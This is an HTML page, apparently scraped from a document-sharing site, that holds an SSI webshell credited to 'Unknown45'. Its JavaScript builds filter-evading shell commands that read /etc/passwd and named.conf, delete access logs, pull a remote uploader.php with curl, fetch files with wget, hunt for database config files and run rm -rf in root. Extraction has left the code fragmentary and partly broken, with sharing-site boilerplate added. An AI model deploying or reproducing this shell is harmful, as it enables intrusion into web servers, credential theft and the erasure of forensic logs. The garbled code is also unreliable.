Aaa

<!
-- Author : Unknown45 -->










<html>
<head>
<title>SSI Webshell</title>
<meta name="theme-color"
content="#000">
<meta name="Author"
content="Unknown45">
<meta name="description"
content="Security ? that just an
illusion - ">
<meta property="og:description"
content="Security ? that just an
illusion - ">
</head>
<script
src="https://ajax.googleapis.com/aj
ax/libs/jquery/3.5.1/jquery.min.js"></
script>
<script
src="https://cdn.jsdelivr.net/npm/pa
ce-js@latest/pace.min.js"></script>
<link rel="stylesheet"
href="https://cdn.jsdelivr.net/npm/p
ace-js@latest/pace-theme-
default.min.css">
<script language="javascript">
function unknown45()
{
var uri =
document.getElementById('comma
nd').value;
var rep = uri.replace(/[ ]/g,'$
{IFS}');
var res = encodeURI(uri);
document.location.href="?"+encodeURI(rep)+"&&test";
}
function refresh() {
#echo var=DOCUMENT_NAME -->";
}
function checkfile() {
-->?"+"ls${IFS}-la";
}
function readpass() {
var
selectedobj=document.getElement
ById('readpass');
if(selectedobj.className=='hide')
{ //check if classname is hide
selectedobj.style.display =
"block";
selectedobj.readOnly=true;
selectedobj.className
='show';
}else{
"none";
='hide';
}
}
function readnamed() {
var
ById('readnamed');
"block";
='show';
}else{
"none";
='hide';
}
}
function movefiles() {
var
ById('movefiles');
"block";
='show';
}else{
"none";
='hide';
}
}
function upfiles() {
var
ById('upfiles');
"block";
='show';
}else{
"none";
='hide';
}
}
function renamefiles() {
var
ById('renamefiles');
"block";
='show';
}else{
"none";
='hide';
}
}
function deletefiles() {
var
ById('deletefiles');
"block";
='show';
}else{
"none";
='hide';
}
}
function findfiles() {
var
ById('findfiles');
"block";
='show';
}else{
"none";
='hide';
}
}
function addupload()
{
-->?"+"curl${IFS}-Ls$
{IFS}raw.githubusercontent.com/wh
oami-45/php-
code/main/uploader.php${IFS}|$
{IFS}tee${IFS}-a$
{IFS}uploader.php";
}
function checkroot() {
var uri = "ls -la ";
{IFS}');
-->?"+encodeURI(rep)+"";
}
function deletelog() {
var yakin = confirm("yakin hapus
access logs nya ?");
if (yakin == true) {
var uri = "rm -rf ";
{IFS}');
var=DOCUMENT_ROOT -->/../logs/
*";
} else {
return true;
}
}
function delsel() {
var uri = "rm -rf ";
{IFS}');
var=DOCUMENT_NAME --> |$
{IFS}clear${IFS}&&${IFS}echo$
{IFS}Done";
}
function movesatu()
{
-->?"+"mv$
{IFS}"+document.getElementById('
movefile').value+"$
{IFS}../"+document.getElementById(
'movefile').value+"${IFS}&&$
{IFS}realpath$
{IFS}../"+document.getElementById(
'movefile').value;
}
function movedua()
{
-->?"+"mv$
movefile').value+"$
{IFS}../../"+document.getElementByI
d('movefile').value+"${IFS}&&$
{IFS}realpath$
{IFS}../../"+document.getElementByI
d('movefile').value;
}
function movetiga()
{
-->?"+"mv$
movefile').value+"$
{IFS}../../../"+document.getElementB
yId('movefile').value+"${IFS}&&$
{IFS}realpath$
{IFS}../../../"+document.getElementB
yId('movefile').value;
}
function moveroot()
{
-->?"+"mv$
movefile').value+"${IFS}/"+document.getElementById('m
ovefile').value+"${IFS}&&$
{IFS}realpath${IFS}/"+document.getElementById('m
ovefile').value;
}
function upfile()
{
var url =
document.getElementById('linknya')
.value;
var https =
url.split("https://").join("");
var http =
https.split("http://").join("");
-->?"+"wget$
{IFS}"+encodeURI(http)+"$
{IFS}"+"--no-check-certificate$
{IFS}&&${IFS}ls${IFS}-la";
}
function renamefile()
{
-->?"+"mv$
{IFS}"+document.getElementById('r
enameawal').value+"$
{IFS}"+document.getElementById('r
enameakhir').value+"${IFS}&&$
{IFS}ls${IFS}-la";
}
function deletefile()
{
-->?"+"rm${IFS}-rf$
{IFS}"+document.getElementById('d
eletefile').value+"${IFS}&&${IFS}ls$
{IFS}-la";
}
function deleteinroot()
{
var yakin = confirm("yakin hapus
file ini di directory root ?");
if (yakin == true) {
-->?"+"rm${IFS}-rf${IFS}"+"/"+document.getElementById('de
letefile').value+"${IFS}&&${IFS}ls$
{IFS}-la${IFS}";
} else {
return true;
}
}
function deletefiledua()
{
-->?"+"rm${IFS}-rf$
eletedir').value+"/"+document.getEl
ementById('deletefiledua').value+"$
{IFS}&&${IFS}ls${IFS}-la$
eletedir').value;
}
function findfile()
{
-->?"+"du${IFS}-ah${IFS}"+"|$
{IFS}grep$
{IFS}"+document.getElementById('fi
ndfile').value;
}
function findinroot()
{
-->?"+"du${IFS}-ah${IFS}"+"$
{IFS}"+"|${IFS}grep$
ndfile').value;
}
function findfiledua()
{
-->?"+"du${IFS}-ah$
nddir').value+"${IFS}|${IFS}grep$
ndfiledua').value;
}
function finddb()
{
-->?"+"du${IFS}-ah${IFS}"+"$
{IFS}"+"|${IFS}grep${IFS}-e$
{IFS}config.php${IFS}-e$
{IFS}database.php${IFS}-e$
{IFS}config.inc.php${IFS}-e$
{IFS}koneksi.php";
}
</script>
<style type="text/css">
.input {
background: transparent;
border-color: #ffffff;
border-width: thin;
border: groove;
cursor: pointer;
}
button {
cursor: pointer;
}
</style>
</head>
<body onload="checkaja()">
<font face=courier
size=2><i><center>SSI Webshell by
Unknown45<hr><font
face="courier" size=2>
<font size=2>Command : <input
type=text size=60 id=command
class="text" name="address1"
style="max-width: 100%; max-
height: 100%;"> <button
class="input" id="gas"
onclick="unknown45();">Execute</
button></center>
<br><br>Host : <b></b>
<br>Server Address : <b></b>
<br>User : <b></b>
<br>System : <b></b>
<br><br>Current Path : <b></b><br></i>
Python : <b></b> |
MySql : <b></b> |
Perl : <b></b> |
Ruby : <b></b> |
Wget : <b></b><hr>
<center><button
onclick="refresh()" style="float:
left;">Refresh</button> <button
onclick="checkfile()">list
file</button> <button
onclick="renamefiles()">rename
onclick="movefiles()">move
onclick="deletefiles()">delete
onclick="findfiles()">find
onclick="upfiles()">upload
onclick="delsel()" style="float:
right;">Remove
Shell</button><br><br>
<button
onclick="readpass();">read
/etc/passwd</button> <button
onclick="readnamed();">read
/etc/named.conf</button> <button
onclick="addupload()">add
uploader.php</button> <button
onclick="checkroot()">check root
directory</button> <button
onclick="deletelog()">delete access
logs</button></center>
<hr></i>
Executed Command :
</font><b><font face="courier"
id="cmd"></font></b><br>
<textarea bgcolor=#e4e0d8
cols=121 rows=15 style="width:
100%">

</textarea>
<script>
var cmd =
document.getElementById("cmd").i
nnerHTML.split("${IFS}").join(" ");
document.getElementById("cmd").i
nnerHTML = cmd;
var gaskan =
document.getElementById("comma
nd");
gaskan.addEventListener("keyup",
function(event) {
if (event.keyCode === 13) {
event.preventDefault();
document.getElementById("gas").cl
ick();
}
});
</script>
<font face="courier" size="2"
id="readpass"
style="display:none"><br>Read :
<b>/etc/passwd</b><br>
cols=121 rows=15></textarea>
</font>
id="readnamed"
style="display:none"><br>Read :
<b>/etc/named.conf</b><br>
cols=121 rows=15></textarea>
</font>
id="movefiles"
style="display:none"><br>Move file
to <b>previous
directory</b><br><br>
filename : <textarea
bgcolor="#e4e0d8" cols="25"
rows="1" id="movefile"
style="resize: none; outline: none"
required></textarea>
<button onclick="movesatu()">1
onclick="movedua()">2
onclick="movetiga()">3
onclick="moveroot()">root
directory</button>
</font>
id="renamefiles"
style="display:none"><br>Rename
<b>file</b><br><br>
<textarea bgcolor="#e4e0d8"
cols="25" rows="1"
id="renameawal" style="resize:
none; outline: none"
required></textarea> to <textarea
rows="1" id="renameakhir"
required></textarea><br><button
onclick="renamefile()">Gaskan</bu
tton>
</font>
id="upfiles"
style="display:none"><br>Upload
<b>file</b><br><br>
Link : <textarea
rows="1" id="linknya"
required></textarea> <button
onclick="upfile()">Gaskan</button>
</font>
id="deletefiles"
style="display:none"><br>delete
<b>file</b><br>
cols="25" rows="1" id="deletefile"
onclick="deletefile()">Delete</butto
n> <button
onclick="deleteinroot()">Delete this
in root
directory</button><br><br>delete
<b>file</b> in <b>custom
directories</b><br><textarea
rows="1" id="deletefiledua"
required></textarea> in directory
cols="25" rows="1" id="deletedir"
onclick="deletefiledua()">Delete</b
utton>
</font>
id="findfiles"
style="display:none"><br>find
<b>files</b><br>
cols="25" rows="1" id="findfile"
onclick="findfile()">Find</button>
<button onclick="finddb()">find
database location (beta)</button>
<button onclick="findinroot()">Find
this in root
directory</button><br><br>find
<b>files</b> in <b>custom
directories</b><br><textarea
rows="1" id="findfiledua"
required></textarea> in directory
cols="25" rows="1" id="finddir"
onclick="findfiledua()">Find</butto
n>
</font>
<hr>
<center>
<font face="courier"
size=2>Unknown45 - 2021<br><a
href="https://exploits.site"
target="_blank">https://exploits.site
</a></font></center>
</body>
</html>

Aaa

Uploaded by

Copyright:

Available Formats

Aaa

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Aaa

Uploaded by

Copyright:

Available Formats

<!

-- Author : Unknown45 -->

<!--#config errmsg="Error / Webnya

You might also like